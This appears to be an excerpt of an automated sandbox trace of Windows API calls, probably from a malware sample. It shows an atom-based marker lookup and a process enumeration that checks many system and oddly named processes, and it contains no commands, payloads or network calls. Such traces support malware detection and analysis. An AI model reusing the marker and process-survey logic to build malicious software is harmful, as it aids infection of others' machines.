	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetLastError () returned 0x5
	[0122.818] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.818] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0122.819] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.819] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.820] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetLastError () returned 0x5
	[0122.821] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.822] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0122.822] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.822] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0122.822] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0122.822] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0122.822] CloseHandle (hObject=0x698) returned 1
	[0122.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0122.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.823] CloseHandle (hObject=0x698) returned 1
	[0122.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.823] CloseHandle (hObject=0x698) returned 1
	[0122.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5b08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.824] CloseHandle (hObject=0x698) returned 1
	[0122.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.824] CloseHandle (hObject=0x698) returned 1
	[0122.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0122.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16dc8) returned 0xc0000004
	[0122.855] VirtualAlloc (lpAddress=0x0, dwSize=0x16ec8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c20000
	[0122.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c20000, Length=0x16ec8, ResultLength=0x0 | out: SystemInformation=0x3c20000, ResultLength=0x0) returned 0x0
	[0122.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0122.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5b80, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0122.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5ad8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d628, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.860] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.861] CloseHandle (hObject=0x698) returned 1
	[0122.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b68, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.861] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.861] CloseHandle (hObject=0x698) returned 1
	[0122.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399cea8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0122.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.862] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.862] CloseHandle (hObject=0x698) returned 1
	[0122.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.862] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.862] CloseHandle (hObject=0x698) returned 1
	[0122.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5a00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.862] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.862] CloseHandle (hObject=0x698) returned 1
	[0122.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.863] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.863] CloseHandle (hObject=0x698) returned 1
	[0122.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.863] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.863] CloseHandle (hObject=0x698) returned 1
	[0122.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.863] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.863] CloseHandle (hObject=0x698) returned 1
	[0122.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.864] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.864] CloseHandle (hObject=0x698) returned 1
	[0122.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5ad8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.864] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.864] CloseHandle (hObject=0x698) returned 1
	[0122.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.865] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.865] CloseHandle (hObject=0x698) returned 1
	[0122.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.865] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.865] CloseHandle (hObject=0x698) returned 1
	[0122.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.865] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.866] CloseHandle (hObject=0x698) returned 1
	[0122.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d618, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.866] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.866] CloseHandle (hObject=0x698) returned 1
	[0122.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399cea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0122.866] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.866] CloseHandle (hObject=0x698) returned 1
	[0122.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9820, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0122.867] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.867] CloseHandle (hObject=0x698) returned 1
	[0122.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.867] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.867] CloseHandle (hObject=0x698) returned 1
	[0122.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5a30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.867] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.867] CloseHandle (hObject=0x698) returned 1
	[0122.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5ad8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.868] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.868] CloseHandle (hObject=0x698) returned 1
	[0122.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.868] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.868] CloseHandle (hObject=0x698) returned 1
	[0122.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.868] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.868] CloseHandle (hObject=0x698) returned 1
	[0122.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5aa8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.868] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.869] CloseHandle (hObject=0x698) returned 1
	[0122.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.869] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.869] CloseHandle (hObject=0x698) returned 1
	[0122.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b99d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0122.869] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.869] CloseHandle (hObject=0x698) returned 1
	[0122.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5a00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
